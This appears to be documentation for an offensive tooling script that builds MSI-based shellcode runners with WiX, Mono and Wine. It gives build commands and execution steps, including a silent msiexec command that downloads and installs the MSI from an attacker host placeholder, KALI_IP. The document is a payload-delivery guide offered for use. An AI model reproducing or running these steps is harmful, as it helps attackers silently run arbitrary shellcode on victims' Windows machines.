MSI Runner

Generate and execute MSI-based shellcode runners.

Uses Mono, Wine, and an XML template. Output: payloads/MSI/shellcode_runner.msi.

Steps

1. Modify line 16 in Templates/MSI/shellcode_runner.xml
2. Run apophis.sh to generate the MSI
3. Execute:

msiexec /q /i shellcode_runner.msi
msiexec /q /i http://KALI_IP/shellcode_runner.msi

Manual Generation

# Create .wixobj
cd Templates/MSI/wix311-binaries
mono candle.exe -out ../ -arch x64 ../shellcode_runner.xml

# Generate .MSI
wine light.exe -out ../shellcode_runner.msi ../shellcode_runner.wixobj -sval

Requires Wine installed. See the Installation page for Wine setup steps.
